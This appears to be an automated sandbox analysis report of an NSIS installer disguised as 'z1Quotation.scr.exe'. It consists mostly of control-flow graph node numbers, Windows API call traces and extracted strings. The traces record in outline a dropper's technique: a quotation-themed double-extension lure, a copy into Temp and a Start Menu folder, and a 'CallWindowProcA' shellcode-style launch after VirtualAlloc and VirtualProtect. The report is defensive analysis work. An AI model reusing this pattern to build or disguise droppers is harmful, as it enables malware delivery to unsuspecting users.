4212 405787 GetDlgItem SendMessageA 4208->4212 4209 4058d8 GetWindowRect 4210 4058eb TrackPopupMenu 4209->4210 4210->4197 4213 405907 4210->4213 4214 405776 4211->4214 4215 405769 ShowWindow 4211->4215 4212->4197 4216 4057ae SendMessageA SendMessageA 4212->4216 4217 405926 SendMessageA 4213->4217 4226 404473 SendMessageA 4214->4226 4215->4214 4216->4197 4217->4217 4218 405943 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4217->4218 4220 405965 SendMessageA 4218->4220 4220->4220 4221 405987 GlobalUnlock SetClipboardData CloseClipboard 4220->4221 4221->4197 4222->4181 4224 406431 21 API calls 4223->4224 4225 404449 SetDlgItemTextA 4224->4225 4225->4208 4226->4212 4227->4182 4229 404424 SendMessageA 4228->4229 4230 40441e 4228->4230 4229->4185 4230->4229 4232 404568 4231->4232 4233 4044bd GetWindowLongA 4231->4233 4232->4197 4233->4232 4234 4044d2 4233->4234 4234->4232 4235 404502 4234->4235 4236 4044ff GetSysColor 4234->4236 4237 404512 SetBkMode 4235->4237 4238 404508 SetTextColor 4235->4238 4236->4235 4239 404530 4237->4239 4240 40452a GetSysColor 4237->4240 4238->4237 4241 404541 4239->4241 4242 404537 SetBkColor 4239->4242 4240->4239 4241->4232 4243 404554 DeleteObject 4241->4243 4244 40455b CreateBrushIndirect 4241->4244 4242->4241 4243->4244 4244->4232 4246 4054fd 4245->4246 4254 4055a0 4245->4254 4247 40551a lstrlenA 4246->4247 4248 406431 21 API calls 4246->4248 4249 405543 4247->4249 4250 405528 lstrlenA 4247->4250 4248->4247 4252 405556 4249->4252 4253 405549 SetWindowTextA 4249->4253 4251 40553a lstrcatA 4250->4251 4250->4254 4251->4249 4252->4254 4255 40555c SendMessageA SendMessageA SendMessageA 4252->4255 4253->4252 4254->4198 4255->4254 4271 40643e 4256->4271 4257 40667f 4258 4058ba AppendMenuA 4257->4258 4295 40639e lstrcpynA 4257->4295 4258->4209 4258->4210 4260 406656 lstrlenA 4260->4271 4263 406431 15 API calls 4263->4260 4265 40655d GetSystemDirectoryA 4265->4271 4266 406573 GetWindowsDirectoryA 4266->4271 4268 406431 15 API calls 4268->4271 
4269 4065ff lstrcatA 4269->4271 4271->4257 4271->4260 4271->4263 4271->4265 4271->4266 4271->4268 4271->4269 4272 4065d6 SHGetPathFromIDListA CoTaskMemFree 4271->4272 4273 406285 4271->4273 4278 4067c6 GetModuleHandleA 4271->4278 4284 406698 4271->4284 4293 4062fc wsprintfA 4271->4293 4294 40639e lstrcpynA 4271->4294 4272->4271 4296 406224 4273->4296 4276 4062e8 4276->4271 4277 4062b9 RegQueryValueExA RegCloseKey 4277->4276 4279 4067e2 4278->4279 4280 4067ec GetProcAddress 4278->4280 4300 406758 GetSystemDirectoryA 4279->4300 4282 4067fb 4280->4282 4282->4271 4283 4067e8 4283->4280 4283->4282 4285 4066a4 4284->4285 4287 406701 CharNextA 4285->4287 4289 40670c 4285->4289 4291 4066ef CharNextA 4285->4291 4292 4066fc CharNextA 4285->4292 4303 405d5b 4285->4303 4286 406710 CharPrevA 4286->4289 4287->4285 4287->4289 4289->4286 4290 40672b 4289->4290 4290->4271 4291->4285 4292->4287 4293->4271 4294->4271 4295->4258 4297 406233 4296->4297 4298 406237 4297->4298 4299 40623c RegOpenKeyExA 4297->4299 4298->4276 4298->4277 4299->4298 4301 40677a wsprintfA LoadLibraryExA 4300->4301 4301->4283 4304 405d61 4303->4304 4305 405d74 4304->4305 4306 405d67 CharNextA 4304->4306 4305->4285 4306->4304 4314 40448a 4307->4314 4309 40448a SendMessageA 4311 405610 OleUninitialize 4309->4311 4310 4055d7 4312 4055fe 4310->4312 4317 401389 4310->4317 4312->4309 4315 4044a2 4314->4315 4316 404493 SendMessageA 4314->4316 4315->4310 4316->4315 4319 401390 4317->4319 4318 4013fe 4318->4310 4319->4318 4320 4013cb MulDiv SendMessageA 4319->4320 4320->4319 5869 404c21 5870 404c31 5869->5870 5871 404c4d 5869->5871 5880 405a98 GetDlgItemTextA 5870->5880 5873 404c80 5871->5873 5874 404c53 SHGetPathFromIDListA 5871->5874 5876 404c6a SendMessageA 5874->5876 5877 404c63 5874->5877 5875 404c3e SendMessageA 5875->5871 5876->5873 5878 40140b 2 API calls 5877->5878 5878->5876 5880->5875 4393 4015a2 4394 402c3e 21 API calls 4393->4394 4395 4015a9 SetFileAttributesA 4394->4395 4396 4015bb 4395->4396 4397 402523 
4408 402c7e 4397->4408 4400 402c3e 21 API calls 4401 402536 4400->4401 4402 402540 RegQueryValueExA 4401->4402 4405 4027cd 4401->4405 4403 402560 4402->4403 4407 402566 RegCloseKey 4402->4407 4403->4407 4413 4062fc wsprintfA 4403->4413 4407->4405 4409 402c3e 21 API calls 4408->4409 4410 402c95 4409->4410 4411 406224 RegOpenKeyExA 4410->4411 4412 40252d 4411->4412 4412->4400 4413->4407 5881 401a23 5882 402c3e 21 API calls 5881->5882 5883 401a2c ExpandEnvironmentStringsA 5882->5883 5884 401a40 5883->5884 5886 401a53 5883->5886 5885 401a45 lstrcmpA 5884->5885 5884->5886 5885->5886 5892 401724 5893 402c3e 21 API calls 5892->5893 5894 40172b SearchPathA 5893->5894 5895 401746 5894->5895 5896 401d24 5897 402c1c 21 API calls 5896->5897 5898 401d2b 5897->5898 5899 402c1c 21 API calls 5898->5899 5900 401d37 GetDlgItem 5899->5900 5901 40262d 5900->5901 5902 402aa5 SendMessageA 5903 402aca 5902->5903 5904 402abf InvalidateRect 5902->5904 5904->5903 5905 4045a9 5906 4045bf 5905->5906 5911 4046cb 5905->5911 5909 40443e 22 API calls 5906->5909 5907 40473a 5908 404804 5907->5908 5910 404744 GetDlgItem 5907->5910 5916 4044a5 8 API calls 5908->5916 5912 404615 5909->5912 5913 40475a 5910->5913 5917 4047c2 5910->5917 5911->5907 5911->5908 5914 40470f GetDlgItem SendMessageA 5911->5914 5915 40443e 22 API calls 5912->5915 5913->5917 5922 404780 SendMessageA LoadCursorA SetCursor 5913->5922 5938 404460 KiUserCallbackDispatcher 5914->5938 5920 404622 CheckDlgButton 5915->5920 5921 4047ff 5916->5921 5917->5908 5918 4047d4 5917->5918 5923 4047da SendMessageA 5918->5923 5924 4047eb 5918->5924 5936 404460 KiUserCallbackDispatcher 5920->5936 5939 40484d 5922->5939 5923->5924 5924->5921 5928 4047f1 SendMessageA 5924->5928 5925 404735 5929 404829 SendMessageA 5925->5929 5928->5921 5929->5907 5930 404640 GetDlgItem 5937 404473 SendMessageA 5930->5937 5933 404656 SendMessageA 5934 404674 GetSysColor 5933->5934 5935 40467d SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 5933->5935 
5934->5935 5935->5921 5936->5930 5937->5933 5938->5925 5942 405a7a ShellExecuteExA 5939->5942 5941 4047b3 LoadCursorA SetCursor 5941->5917 5942->5941 5943 4023a9 5944 4023b1 5943->5944 5945 4023b7 5943->5945 5947 402c3e 21 API calls 5944->5947 5946 4023c7 5945->5946 5948 402c3e 21 API calls 5945->5948 5949 402c3e 21 API calls 5946->5949 5951 4023d5 5946->5951 5947->5945 5948->5946 5949->5951 5950 402c3e 21 API calls 5952 4023de WritePrivateProfileStringA 5950->5952 5951->5950 4593 4020aa 4594 4020bc 4593->4594 4595 40216a 4593->4595 4596 402c3e 21 API calls 4594->4596 4597 401423 28 API calls 4595->4597 4598 4020c3 4596->4598 4603 4022ef 4597->4603 4599 402c3e 21 API calls 4598->4599 4600 4020cc 4599->4600 4601 4020e1 LoadLibraryExA 4600->4601 4602 4020d4 GetModuleHandleA 4600->4602 4601->4595 4604 4020f1 GetProcAddress 4601->4604 4602->4601 4602->4604 4605 402100 4604->4605 4606 40213d 4604->4606 4607 402108 4605->4607 4608 40211f 4605->4608 4609 4054e2 28 API calls 4606->4609 4610 401423 28 API calls 4607->4610 4614 6d43176b 4608->4614 4611 402110 4609->4611 4610->4611 4611->4603 4612 40215e FreeLibrary 4611->4612 4612->4603 4615 6d43179b 4614->4615 4656 6d431b28 4615->4656 4617 6d4317a2 4618 6d4318c4 4617->4618 4619 6d4317b3 4617->4619 4620 6d4317ba 4617->4620 4618->4611 4704 6d43233f 4619->4704 4688 6d432381 4620->4688 4625 6d431800 4717 6d432568 4625->4717 4626 6d43181e 4629 6d431824 4626->4629 4630 6d43186c 4626->4630 4627 6d4317d0 4632 6d4317d6 4627->4632 4638 6d4317e1 4627->4638 4628 6d4317e9 4639 6d4317df 4628->4639 4714 6d432d53 4628->4714 4736 6d4315fb 4629->4736 4636 6d432568 11 API calls 4630->4636 4632->4639 4698 6d432ac8 4632->4698 4642 6d43185d 4636->4642 4637 6d431806 4728 6d4315e9 4637->4728 4708 6d432742 4638->4708 4639->4625 4639->4626 4655 6d4318b3 4642->4655 4742 6d43252e 4642->4742 4644 6d4317e7 4644->4639 4645 6d432568 11 API calls 4645->4642 4649 6d4318bd GlobalFree 4649->4618 4652 6d43189f 4652->4655 4746 6d431572 wsprintfA 4652->4746 4653 
6d431898 FreeLibrary 4653->4652 4655->4618 4655->4649 4749 6d4312a5 GlobalAlloc 4656->4749 4658 6d431b4f 4750 6d4312a5 GlobalAlloc 4658->4750 4660 6d431d90 GlobalFree GlobalFree GlobalFree 4661 6d431dad 4660->4661 4672 6d431df7 4660->4672 4662 6d432181 4661->4662 4669 6d431dc2 4661->4669 4661->4672 4664 6d4321a3 GetModuleHandleA 4662->4664 4662->4672 4663 6d431c4d GlobalAlloc 4681 6d431b5a 4663->4681 4667 6d4321b4 LoadLibraryA 4664->4667 4668 6d4321c9 4664->4668 4665 6d431c98 lstrcpyA 4671 6d431ca2 lstrcpyA 4665->4671 4666 6d431cb6 GlobalFree 4666->4681 4667->4668 4667->4672 4757 6d431652 GetProcAddress 4668->4757 4669->4672 4753 6d4312b4 4669->4753 4671->4681 4672->4617 4673 6d43221a 4673->4672 4675 6d432227 lstrlenA 4673->4675 4674 6d432047 4756 6d4312a5 GlobalAlloc 4674->4756 4758 6d431652 GetProcAddress 4675->4758 4679 6d431f89 GlobalFree 4679->4681 4680 6d4320c3 4680->4672 4686 6d43211c lstrcpyA 4680->4686 4681->4660 4681->4663 4681->4665 4681->4666 4681->4671 4681->4672 4681->4674 4681->4679 4681->4680 4682 6d4312b4 2 API calls 4681->4682 4751 6d4315c4 GlobalSize GlobalAlloc 4681->4751 4682->4681 4683 6d4321db 4683->4673 4687 6d432204 GetProcAddress 4683->4687 4684 6d43204f 4684->4617 4686->4672 4687->4673 4694 6d43239a 4688->4694 4690 6d4324d6 GlobalFree 4692 6d4317c0 4690->4692 4690->4694 4691 6d432448 GlobalAlloc MultiByteToWideChar 4693 6d432495 4691->4693 4696 6d432474 GlobalAlloc CLSIDFromString GlobalFree 4691->4696 4692->4627 4692->4628 4692->4639 4693->4690 4764 6d4326d6 4693->4764 4694->4690 4694->4691 4694->4693 4695 6d4312b4 GlobalAlloc lstrcpynA 4694->4695 4760 6d43133d 4694->4760 4695->4694 4696->4690 4700 6d432ada 4698->4700 4699 6d432b7f VirtualAlloc 4703 6d432b9d 4699->4703 4700->4699 4702 6d432c69 4702->4639 4767 6d432a74 4703->4767 4705 6d432354 4704->4705 4706 6d43235f GlobalAlloc 4705->4706 4707 6d4317b9 4705->4707 4706->4705 4707->4620 4712 6d432772 4708->4712 4709 6d432820 4711 6d432826 GlobalSize 4709->4711 4713 6d432830 4709->4713 
4710 6d43280d GlobalAlloc 4710->4713 4711->4713 4712->4709 4712->4710 4713->4644 4715 6d432d5e 4714->4715 4716 6d432d9e GlobalFree 4715->4716 4771 6d4312a5 GlobalAlloc 4717->4771 4719 6d4325f3 lstrcpynA 4724 6d432574 4719->4724 4720 6d432604 StringFromGUID2 WideCharToMultiByte 4720->4724 4721 6d432628 WideCharToMultiByte 4721->4724 4722 6d43266d GlobalFree 4722->4724 4723 6d432649 wsprintfA 4723->4724 4724->4719 4724->4720 4724->4721 4724->4722 4724->4723 4725 6d4326a7 GlobalFree 4724->4725 4726 6d4312f6 2 API calls 4724->4726 4772 6d431361 4724->4772 4725->4637 4726->4724 4776 6d4312a5 GlobalAlloc 4728->4776 4730 6d4315ee 4731 6d4315fb 2 API calls 4730->4731 4732 6d4315f8 4731->4732 4733 6d4312f6 4732->4733 4734 6d431338 GlobalFree 4733->4734 4735 6d4312ff GlobalAlloc lstrcpynA 4733->4735 4734->4642 4735->4734 4737 6d431607 wsprintfA 4736->4737 4738 6d431634 lstrcpyA 4736->4738 4741 6d43164d 4737->4741 4738->4741 4741->4645 4743 6d43187f 4742->4743 4744 6d43253c 4742->4744 4743->4652 4743->4653 4744->4743 4745 6d432555 GlobalFree 4744->4745 4745->4744 4747 6d4312f6 2 API calls 4746->4747 4748 6d431593 4747->4748 4748->4655 4749->4658 4750->4681 4752 6d4315e2 4751->4752 4752->4681 4759 6d4312a5 GlobalAlloc 4753->4759 4755 6d4312c3 lstrcpynA 4755->4672 4756->4684 4757->4683 4758->4672 4759->4755 4761 6d431344 4760->4761 4762 6d4312b4 2 API calls 4761->4762 4763 6d43135f 4762->4763 4763->4694 4765 6d4326e4 VirtualAlloc 4764->4765 4766 6d43273a 4764->4766 4765->4766 4766->4693 4768 6d432a7f 4767->4768 4769 6d432a84 GetLastError 4768->4769 4770 6d432a8f 4768->4770 4769->4770 4770->4702 4771->4724 4773 6d43136a 4772->4773 4774 6d431389 4772->4774 4773->4774 4775 6d431370 lstrcpyA 4773->4775 4774->4724 4775->4774 4776->4730 5953 402e2a 5954 402e52 5953->5954 5955 402e39 SetTimer 5953->5955 5956 402ea0 5954->5956 5957 402ea6 MulDiv 5954->5957 5955->5954 5958 402e60 wsprintfA SetWindowTextA SetDlgItemTextA 5957->5958 5958->5956 4787 40242e 4788 402460 4787->4788 4789 
402435 4787->4789 4791 402c3e 21 API calls 4788->4791 4790 402c7e 21 API calls 4789->4790 4792 40243c 4790->4792 4793 402467 4791->4793 4794 402446 4792->4794 4797 402474 4792->4797 4799 402cfc 4793->4799 4796 402c3e 21 API calls 4794->4796 4798 40244d RegDeleteValueA RegCloseKey 4796->4798 4798->4797 4800 402d0f 4799->4800 4802 402d08 4799->4802 4800->4802 4803 402d40 4800->4803 4802->4797 4804 406224 RegOpenKeyExA 4803->4804 4805 402d6e 4804->4805 4806 402e18 4805->4806 4807 402d7e RegEnumValueA 4805->4807 4811 402da1 4805->4811 4806->4802 4808 402e08 RegCloseKey 4807->4808 4807->4811 4808->4806 4809 402ddd RegEnumKeyA 4810 402de6 RegCloseKey 4809->4810 4809->4811 4812 4067c6 5 API calls 4810->4812 4811->4808 4811->4809 4811->4810 4813 402d40 6 API calls 4811->4813 4814 402df6 4812->4814 4813->4811 4814->4806 4815 402dfa RegDeleteKeyA 4814->4815 4815->4806 5967 4027af 5968 402c3e 21 API calls 5967->5968 5969 4027b6 FindFirstFileA 5968->5969 5970 4027d9 5969->5970 5974 4027c9 5969->5974 5971 4027e0 5970->5971 5975 4062fc wsprintfA 5970->5975 5976 40639e lstrcpynA 5971->5976 5975->5971 5976->5974 5157 6d4329b1 5158 6d432a01 5157->5158 5159 6d4329c1 VirtualProtect 5157->5159 5159->5158 5977 401c33 5978 402c1c 21 API calls 5977->5978 5979 401c3a 5978->5979 5980 402c1c 21 API calls 5979->5980 5981 401c47 5980->5981 5982 401c5c 5981->5982 5983 402c3e 21 API calls 5981->5983 5986 402c3e 21 API calls 5982->5986 5989 401c6c 5982->5989 5983->5982 5984 401cc3 5988 402c3e 21 API calls 5984->5988 5985 401c77 5987 402c1c 21 API calls 5985->5987 5986->5989 5990 401c7c 5987->5990 5991 401cc8 5988->5991 5989->5984 5989->5985 5992 402c1c 21 API calls 5990->5992 5993 402c3e 21 API calls 5991->5993 5994 401c88 5992->5994 5995 401cd1 FindWindowExA 5993->5995 5996 401cb3 SendMessageA 5994->5996 5997 401c95 SendMessageTimeoutA 5994->5997 5998 401cef 5995->5998 5996->5998 5997->5998 5999 402633 6000 402638 5999->6000 6001 40264c 5999->6001 6002 402c1c 21 API calls 6000->6002 6003 402c3e 
21 API calls 6001->6003 6005 402641 6002->6005 6004 402653 lstrlenA 6003->6004 6004->6005 6006 402675 6005->6006 6007 405fd8 WriteFile 6005->6007 6007->6006 6008 4014b7 6009 4014bd 6008->6009 6010 401389 2 API calls 6009->6010 6011 4014c5 6010->6011 5183 402738 5184 40273f 5183->5184 5186 402a4c 5183->5186 5185 402c1c 21 API calls 5184->5185 5187 402746 5185->5187 5188 402755 SetFilePointer 5187->5188 5188->5186 5189 402765 5188->5189 5191 4062fc wsprintfA 5189->5191 5191->5186 6012 401e3a GetDC 6013 402c1c 21 API calls 6012->6013 6014 401e4c GetDeviceCaps MulDiv ReleaseDC 6013->6014 6015 402c1c 21 API calls 6014->6015 6016 401e7d 6015->6016 6017 406431 21 API calls 6016->6017 6018 401eba CreateFontIndirectA 6017->6018 6019 40262d 6018->6019 6020 406aba 6022 40693e 6020->6022 6021 4072a9 6022->6021 6023 4069c8 GlobalAlloc 6022->6023 6024 4069bf GlobalFree 6022->6024 6025 406a36 GlobalFree 6022->6025 6026 406a3f GlobalAlloc 6022->6026 6023->6021 6023->6022 6024->6023 6025->6026 6026->6021 6026->6022 6027 6d43103d 6028 6d43101b 5 API calls 6027->6028 6029 6d431056 6028->6029

Control-flow Graph (legend: Executed, Not Executed)
APIs
• SetErrorMode.KERNELBASE(00008001), ref: 004034F4
• GetVersionExA.KERNEL32(?), ref: 0040351D
• GetVersionExA.KERNEL32(0000009C), ref: 00403534
• lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004035FD
• #17.COMCTL32(?,00000008,0000000A,0000000C), ref: 0040363A
• OleInitialize.OLE32(00000000), ref: 00403641
• SHGetFileInfoA.SHELL32(0041F910,00000000,?,00000160,00000000,?,00000008,0000000A,0000000C), ref: 0040365F
• GetCommandLineA.KERNEL32(Inaugurates Setup,NSIS Error,?,00000008,0000000A,0000000C), ref: 00403674
• CharNextA.USER32(00000000,"C:\Users\user\Desktop\z1Quotation.scr.exe",00000020,"C:\Users\user\Desktop\z1Quotation.scr.exe",00000000,?,00000008,0000000A,0000000C), ref: 004036AE
• GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000008,0000000A,0000000C), ref: 004037A7
• GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C), ref: 004037B8
• lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C), ref: 004037C4
• GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C), ref: 004037D8
• lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C), ref: 004037E0
• SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C), ref: 004037F1
• SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C), ref: 004037F9
                                                                                                                  • DeleteFileA.KERNELBASE(1033,?,00000008,0000000A,0000000C), ref: 0040380D
                                                                                                                  • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C), ref: 004038B8
                                                                                                                  • ExitProcess.KERNEL32 ref: 004038D9
                                                                                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\z1Quotation.scr.exe",00000000,?,?,00000008,0000000A,0000000C), ref: 004038E8
                                                                                                                  • wsprintfA.USER32 ref: 0040393F
                                                                                                                  • GetFileAttributesA.KERNEL32(988,C:\Users\user\AppData\Local\Temp\,988,?,0000000C), ref: 00403971
                                                                                                                  • DeleteFileA.KERNEL32(988), ref: 0040397D
                                                                                                                  • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,988,?,0000000C), ref: 004039A9
                                                                                                                  • CopyFileA.KERNEL32(C:\Users\user\Desktop\z1Quotation.scr.exe,988,?), ref: 004039BF
                                                                                                                  • CloseHandle.KERNEL32(00000000,user32::CallWindowProcA(i r1 ,i 0,i 0, i 0, i 0),user32::CallWindowProcA(i r1 ,i 0,i 0, i 0, i 0),?,988,00000000), ref: 00403A12
                                                                                                                  • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C), ref: 00403A2F
                                                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00403A36
                                                                                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403A4A
                                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403A69
                                                                                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 00403A8E
                                                                                                                  • ExitProcess.KERNEL32 ref: 00403AAF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$Process$Exit$CurrentDeleteDirectoryEnvironmentPathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCloseCommandCopyErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuewsprintf
                                                                                                                  • String ID: "$"C:\Users\user\Desktop\z1Quotation.scr.exe"$1033$988$A$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55\Jolines$C:\Users\user\Desktop$C:\Users\user\Desktop\z1Quotation.scr.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inaugurates Setup$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`K(v$user32::CallWindowProcA(i r1 ,i 0,i 0, i 0, i 0)$~nsu%X.tmp
                                                                                                                  • API String ID: 2956269667-185225626

                                                                                                                  Control-flow Graph: basic blocks 152 to 202, first block 405620-40563c (graph not reproduced)
                                                                                                                  APIs
                                                                                                                  • GetDlgItem.USER32(?,00000403), ref: 0040567F
                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 0040568E
                                                                                                                  • GetClientRect.USER32(?,?), ref: 004056CB
                                                                                                                  • GetSystemMetrics.USER32(00000002), ref: 004056D2
                                                                                                                  • SendMessageA.USER32(?,0000101B,00000000,?), ref: 004056F3
                                                                                                                  • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405704
                                                                                                                  • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405717
                                                                                                                  • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405725
                                                                                                                  • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405738
                                                                                                                  • ShowWindow.USER32(00000000,?,0000001B,?), ref: 0040575A
                                                                                                                  • ShowWindow.USER32(?,00000008), ref: 0040576E
                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 0040578F
                                                                                                                  • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040579F
                                                                                                                  • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004057B8
                                                                                                                  • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004057C4
                                                                                                                  • GetDlgItem.USER32(?,000003F8), ref: 0040569D
                                                                                                                    • Part of subcall function 00404473: SendMessageA.USER32(00000028,?,?,004042A3), ref: 00404481
                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004057E0
                                                                                                                  • CreateThread.KERNELBASE(00000000,00000000,Function_000055B4,00000000), ref: 004057EE
                                                                                                                  • CloseHandle.KERNELBASE(00000000), ref: 004057F5
                                                                                                                  • ShowWindow.USER32(00000000), ref: 00405818
                                                                                                                  • ShowWindow.USER32(?,00000008), ref: 0040581F
                                                                                                                  • ShowWindow.USER32(00000008), ref: 00405865
                                                                                                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405899
                                                                                                                  • CreatePopupMenu.USER32 ref: 004058AA
                                                                                                                  • AppendMenuA.USER32(00000000,00000000,?,00000000), ref: 004058BF
                                                                                                                  • GetWindowRect.USER32(?,000000FF), ref: 004058DF
                                                                                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004058F8
                                                                                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405934
                                                                                                                  • OpenClipboard.USER32(00000000), ref: 00405944
                                                                                                                  • EmptyClipboard.USER32 ref: 0040594A
                                                                                                                  • GlobalAlloc.KERNEL32(00000042,?), ref: 00405953
                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 0040595D
                                                                                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405971
                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0040598A
                                                                                                                  • SetClipboardData.USER32(?,00000000), ref: 00405995
                                                                                                                  • CloseClipboard.USER32 ref: 0040599B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                  • String ID: PB
                                                                                                                  • API String ID: 590372296-3672992855

                                                                                                                  Control-flow Graph: basic blocks 203 to 309, first block 403f44-403f56 (graph not reproduced)
                                                                                                                  APIs
                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403F80
                                                                                                                  • ShowWindow.USER32(?), ref: 00403FA0
                                                                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 00403FB2
                                                                                                                  • ShowWindow.USER32(?,00000004), ref: 00403FCB
                                                                                                                  • DestroyWindow.USER32 ref: 00403FDF
                                                                                                                  • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403FF8
                                                                                                                  • GetDlgItem.USER32(?,?), ref: 00404017
                                                                                                                  • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 0040402B
                                                                                                                  • IsWindowEnabled.USER32(00000000), ref: 00404032
                                                                                                                  • GetDlgItem.USER32(?,?), ref: 004040DD
                                                                                                                  • GetDlgItem.USER32(?,00000002), ref: 004040E7
                                                                                                                  • SetClassLongA.USER32(?,000000F2,?), ref: 00404101
                                                                                                                  • SendMessageA.USER32(0000040F,00000000,?,?), ref: 00404152
                                                                                                                  • GetDlgItem.USER32(?,00000003), ref: 004041F8
                                                                                                                  • ShowWindow.USER32(00000000,?), ref: 00404219
                                                                                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040422B
                                                                                                                  • EnableWindow.USER32(?,?), ref: 00404246
                                                                                                                  • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 0040425C
                                                                                                                  • EnableMenuItem.USER32(00000000), ref: 00404263
                                                                                                                  • SendMessageA.USER32(?,000000F4,00000000,?), ref: 0040427B
                                                                                                                  • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 0040428E
                                                                                                                  • lstrlenA.KERNEL32(Inaugurates Setup: Installing,?,Inaugurates Setup: Installing,00000000), ref: 004042B8
                                                                                                                  • SetWindowTextA.USER32(?,Inaugurates Setup: Installing), ref: 004042C7
                                                                                                                  • ShowWindow.USER32(?,0000000A), ref: 004043FB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                  • String ID: Inaugurates Setup: Installing
                                                                                                                  • API String ID: 121052019-74818142

                                                                                                                  Control-flow Graph (starting block 405b60-405b86)
                                                                                                                  APIs
                                                                                                                  • DeleteFileA.KERNELBASE(?,?,76273410,76272EE0,"C:\Users\user\Desktop\z1Quotation.scr.exe"), ref: 00405B89
                                                                                                                  • lstrcatA.KERNEL32(00421958,\*.*,00421958,?,?,76273410,76272EE0,"C:\Users\user\Desktop\z1Quotation.scr.exe"), ref: 00405BD1
                                                                                                                  • lstrcatA.KERNEL32(?,0040A014,?,00421958,?,?,76273410,76272EE0,"C:\Users\user\Desktop\z1Quotation.scr.exe"), ref: 00405BF2
                                                                                                                  • lstrlenA.KERNEL32(?,?,0040A014,?,00421958,?,?,76273410,76272EE0,"C:\Users\user\Desktop\z1Quotation.scr.exe"), ref: 00405BF8
                                                                                                                  • FindFirstFileA.KERNEL32(00421958,?,?,?,0040A014,?,00421958,?,?,76273410,76272EE0,"C:\Users\user\Desktop\z1Quotation.scr.exe"), ref: 00405C09
                                                                                                                  • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405CB6
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00405CC7
                                                                                                                  Strings
                                                                                                                  • \*.*, xrefs: 00405BCB
                                                                                                                  • "C:\Users\user\Desktop\z1Quotation.scr.exe", xrefs: 00405B69
